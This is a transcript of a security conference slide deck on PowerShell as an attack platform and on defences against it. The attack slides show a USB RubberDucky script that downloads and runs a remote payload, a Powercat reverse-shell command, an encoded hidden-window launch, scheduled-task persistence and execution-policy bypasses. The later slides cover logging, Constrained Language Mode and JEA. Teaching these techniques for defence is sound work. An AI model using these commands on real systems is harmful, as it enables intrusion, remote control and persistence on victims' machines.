The Dark Side of PowerShell by George Dobrea
-
Upload
ec-council -
Category
Technology
-
view
137 -
download
3
Transcript of The Dark Side of PowerShell by George Dobrea
![Page 1: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/1.jpg)
The Dark Side of PowerShellGeorge Dobrea
![Page 2: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/2.jpg)
George [email protected] | @gdobrea
Microsoft Certified Trainer (since 1998)
MVP – Enterprise Security (since 2005)
EC-Council Instructor of the Year (2016)
![Page 3: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/3.jpg)
My Last trips: Bucharest (home)
Tokyo
Phnom Penh / Cambodia
Washington DC
New Delhi
Dubai
London
Brussels
Vilnius, Tallinn, Riga
Finland
Peru
Germany
Toronto
Cape Town
Teaching / Consulting / Speaking / VolunteeringOr Just Travelling for Fun…
![Page 4: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/4.jpg)
My First Public Speech about PowerShell Vulnerabilities in a MS conference…
![Page 5: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/5.jpg)
> Get-content
PowerShell as an attack platform
PowerShell malware
Pen Testing tools based on PowerShell
PowerShell security, and bypassing that security
Defence strategies
PowerShell v5 new security features
![Page 6: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/6.jpg)
PowerShell
Shell and scripting language present by default on all Windows machines.
… Now open sourced and available on Linux
Designed to automate things and make life easier for system admin.
Based on .Net framework and is tightly integrated with Windows.
Access to the Win32 and Native API
Easy to learn and to write scripts !
![Page 7: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/7.jpg)
Tesla PowerShell Module
![Page 8: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/8.jpg)
Current Landscape of PowerShell Threats
38 % of security incidents reported utilized PowerShell in some form or another
68 % of system breaches having some PowerShell involvement.
31 % of all reported incidents involving PowerShell drummed up no security alerts before the threat was discovered.
Carbon Black - United Threat Research Report 2016
“If PowerShell is a hammer, everything is a nail”
![Page 9: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/9.jpg)
Why using PowerShell for attacks?
![Page 10: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/10.jpg)
… Why Not?Powershell is an ideal platform for attackers
Installed by DEFAULT on Windows Systems
Provides access to almost everything in a Windows platform which could be useful for an attackero Registry, file system, active directory, networking, services, processes, WMI,
COM, Hyper-V
Run code in memory without touching disk
WinRM is enabled by DEFAULT on Windows Server
Trusted by countermeasures (AntiVirus) and SysAdmins
A wealth of attack / pen testing tools already exist: o Shellcode injectors, DLL injectors, keyloggers, port-scanners, reverse/bind
shells, botnets, hash dumping utilities
![Page 11: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/11.jpg)
PowerShell attack code can be invoked by:
Microsoft Office Macro (VBA)
WMI
HTA Script (HTML Application – control panel extensions)
CHM (compiled HTML help)
Java JAR file
Other script type (VBS/WSH/BAT/CMD)
Typically an Encoded Command
Encoded commands obfuscate attack code and can even be compressed to avoid the Windows console character limitation (8191)
Powershell.exe –WindowStyle Hidden –noprofile –EncodedCommand <BASE64ENCODED>
![Page 12: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/12.jpg)
Great, but how do I execute it on a victim machine ?
Code execution gained from an existing exploit
Via a website command injection vulnerability
Physical access – USB HID device
Stolen / captured credentials. With credentials, remote code execution
can be gained with: WMI
WSMAN
RDP, PowerShell Web Access ( yes, you can run PS from your smartphone ), etc…
![Page 13: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/13.jpg)
New Malicious Attacks using PowerShell…
![Page 14: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/14.jpg)
Real world PowerShell Malware
PowerWorm:
Infect’s Word and Excel documents, initial infection via macro in .doc/.xls
PoshKoder/PoshCoder:
PowerWorm crossed with CryptoLocker
Bitcoin ransom
DNSChanger
Trojan.DNSChanger circumvents Powershell restrictions
![Page 15: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/15.jpg)
Valuable Resource for Pen Testers : PoshInternals
https://github.com/adamdriscoll/PoshInternals
![Page 16: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/16.jpg)
Valuable Resource for Pen Testers : PowerSploit
https://github.com/mattifestation/PowerSploit
![Page 17: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/17.jpg)
Valuable Resource for Pen Testers : PowerShellEmpire
http://www.PowerShellEmpire.com
Modules: Code Execution
Collection
Credentials
Exfiltration
Exploitation
Lateral Movement
Management
Persistence
Privilege Escalation
Recon
Situational Awareness
Fun & Trollsploit
Capabilities:
PowerShell based Remote Access
Trojan (RAT).
Python server component (Kali
Linux).
AES Encrypted C2 channel.
Dumps and tracks credentials in
database.
Use: Integrated modules providing
Initial Exploitation, Recon,
Credential Theft & Reuse, as well as
Persistence.
![Page 18: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/18.jpg)
Valuable Resource for Pen Testers : Nishang
https://github.com/samratashok/nishang
![Page 19: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/19.jpg)
Kali Linux – Social Engineering Toolkit (SET)
Kali Linux: More than 600 penetration testing tools included
- Some of them using PowerShell attack techniques
The SET has become a standard in the arsenal of the penetration tester
![Page 20: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/20.jpg)
Demo
USB + PowerShell =
![Page 21: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/21.jpg)
BadUSB RubberDucky Attack ( example #1)
![Page 22: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/22.jpg)
BadUSB RubberDucky Attack ( example #2)
Create a PowerShell Meterpreter reverse TCP payload and place it somewhere on your Kali Linux Web Server
This bypasses most AV, HIPS, IDS and Firewalls and leaves no evidence on the system
DELAY 750GUI rDELAY 750STRING cmdDELAY 200ENTERDELAY 200STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.132/powershell.ps1')DELAY 200ENTER
![Page 23: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/23.jpg)
Administrative privileges required
Not persistent – limited to the current session
Limitations of PowerShell Attacks
![Page 24: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/24.jpg)
Post Exploitation Attack Style
… Or better use PowerCat instead - this a PowerShell version of net cat
![Page 25: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/25.jpg)
DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING POWERSHELL.EXE -EX UNRESTRICTED -C "IMPORT-MODULE('{0}:\POWERCAT.PS1' -F (GET-VOLUME -FILESYSTEMLABELDUCKY).DRIVELETTER); POWERCAT -C 192.168.56.101 -P443 -EP" -WINDOWSTYLE HIDDEN
ENTER
Example: RubberDucky & Powercat Reverse Shell
![Page 26: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/26.jpg)
Basic methods (easy to implement, also to detect and remove) Registry Settings
Scheduled tasks
Advanced Persistent Mechanism: Permanent WMI
What if I want to persist my payloads
PS> schtasks /Create /SC ONIDLE /I 1 `/TN Updater /TR “powershell.exe `-Command Write-Host ‘Doing evil stuff…’“
![Page 27: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/27.jpg)
Windows PowerShell Remoting and WinRM
PowerShell Remoting is based upon WinRM, Microsoft’s WS-Management implementation
Supports execution in 3 ways: Remote enabled commands
Remotely executed script blocks
Remote sessions
Security Model = Trusted Devices + User Credentials
WinRM is required for the Windows Server Manager
WinRM is enabled by DEFAULT on Windows 2012(R2) Server
WinRM is allowed through Windows Firewall on all network profiles!
PowerShell/Win32-OpenSSH - work in progress !
![Page 28: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/28.jpg)
PowerShell Remoting Kerberos Double Hop Solved Securely
$ServerB = Get-ADComputer -Identity ServerB$ServerC = Get-ADComputer -Identity ServerCSet-ADComputer -Identity $ServerC -PrincipalsAllowedToDelegateToAccount $ServerB
No PowerShell code modification.
No more SPNs for constrained delegation!
Credentials are not stored on ServerB.
Multiple domains and forests supported across trusts.https://blogs.technet.microsoft.com/ashleymcglone/2016/08/30/powershell-remoting-kerberos-double-hop-solved-securely/
Resource-Based Kerberos Constrained Delegation is the solution !
![Page 29: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/29.jpg)
PowerShell ‘Legacy’ Security Features
Administrative rights
UAC
Code Signing
Local or Remote source using zone.identifier alternate data stream
PowerShell Execution Policy
![Page 30: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/30.jpg)
Bypassing Execution Policy ( Easy !!!)The PowerShell Execution Policy is not a security boundary
Simply ask PowerShell: powershell.exe –executionpolicy unrestricted
Switch the files zone.idenfier back to local: unblock-file yourscript.ps1
Read the script in and then execute it (may fail depending on script)
Encode the script and use –encodedcommand – always works!!
Get/Steal a certificate, sign script, run script
C:\> powershell.exe –executionpolicy bypass –windowstyle hidden –noninteractive –nologo –file “c:\exploit.ps1”
![Page 31: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/31.jpg)
Operational Security / Dealing with Forensics
Change WinRM settings / Block WinRM ?
Application whitelisting - AppLocker Policies
Enabling Constrained Language Mode
Log PowerShell Activity
Detecting attacks on mitigations (audit any changes to profile.ps1 or the registry keys that control module logging)
![Page 32: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/32.jpg)
PowerShell is not powershell.exe
powershell.exe is just a host application
it hosts the assembly that contains PowerShell and handles I/O
System.Management.Automation.dll
Blocking PowerShell.exe does not stop PowerShell attacks!
![Page 33: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/33.jpg)
PowerShell v5 ♥ the Blue Team !
Over-the-shoulder transcription
Deep script block logging
Antimalware Scan Interface Integration
Cryptographic Message Syntax (CMS) encryption and decryption cmdlets
Secure code generation APIs
Applocker + Constrained Language Mode
Protected Event Logging
Preventing unrestricted admin access (JEA)
![Page 34: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/34.jpg)
PowerShell Logging
PS > Get-EventLog – LogName “Windows PowerShell” - InstanceId 800 |`Where Message –match Add-Type | Select –First 10 | Format-List
Module Logging
Script Block Logging *
System-wide transcripts *
*Enabled by KB3000850 on Windows Server
2012 R2/ Windows 8.1 or WMF 5.0
Microsoft-Windows-PowerShell/Operational events: 4103 –Module logging
4104/4105/4106 –Script block logging
![Page 35: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/35.jpg)
Limiting PowerShell Attack Capability with Constrained Language Mode
removing advanced feature support such as .Net & Windows API calls and COM access
The lack of this advanced functionality stops most PowerShell attack tools
Drawback: an environment variable must be set, either by running a command in PowerShell or via Group Policy
Pairing PowerShell v5 with AppLocker : PowerShell v5 detects when Applocker Allow mode is in effect and sets the
PowerShell language to Constrained Mode for interactive input and user-authored scripts, severely limiting the attack surface on the system
[Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)
![Page 36: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/36.jpg)
Just In Time, Just Enough Administration (JitJea)
based on Windows PowerShell constrained runspaces
allowing specific users to perform administrative tasks on servers without giving them administrator rights
auditing all actions that these users performed
Before JEA PS C:\> Copy-Item C:\SecureFiles\File.txt C:\Deployment\File.txtPS C:\> Get-Content C:\Deployment\File.txtInformation I should not see
Using JEA PS C:\> Copy-Item C:\SecureFiles\File.txt C:\Deployment\File.txtPS C:\> Get-Content C:\Deployment\File.txtThis command is not available
![Page 37: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/37.jpg)
PS> Enter-PSSession Server1FAIL! – Talk to your supervisor for assistance“George I need to be admin on Server1 to restart SQL”
“No Eddie.Just use JEA and connect to the ‘Maintenance EndPoint”
PS> Enter-JeaSession Server1 –Name MaintenanceServer1> Restart-Service MSSQLSERVER
Server1Server1> Steal-SecretsError: You are not authorized to Steal-Secrets
![Page 38: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/38.jpg)
Time to set PowerShell policies in your organization…Sample here:
Change ExecutionPolicy to only allow signed scripts to run.
Require all PowerShell scripts to be run from a specific location or path.
Discourage (or require exception for) the use of encoded parameters on the command line.
Discourage (or block) PowerShell scripts from downloading content from the Internet (or specify a “whitelist” of allowed IP addresses only).
Discourage (or block) the use of PowerShell to invoke commands on remote systems.
Require a custom parameter to be passed on all “legitimate” PowerShell usage.
Restrict PowerShell to specific users in your organization.
Require PowerShell to be launched from a specific process.
![Page 39: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/39.jpg)
Useful Resources
PowerShell Galery• https://www.powershellgallery.com/
Hey, Scripting Guy! Blog• http://blogs.technet.com/b/heyscriptingguy/
Just Enough Administration (JEA)• https://msdn.microsoft.com/en-us/powershell/jea/using-jea
Practical Persistence with PowerShell • http://www.exploit-monday.com/2013/04/PersistenceWithPowerShell.html>
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection https://adsecurity.org/?p=2921
PowerShell Version 5 Security Enhancements• https://adsecurity.org/?p=2277
Blogs of PowerShell gurus: • Jeffrey Snower, Matt Graeber, Adam Driscoll, Sean Metcalf, Will Schroeder
![Page 40: The Dark Side of PowerShell by George Dobrea](https://reader034.fdocuments.in/reader034/viewer/2022042706/587a14561a28abb4238b4f57/html5/thumbnails/40.jpg)
Thank you !
Questions?
George Dobrea
XEduco.net | @gdobrea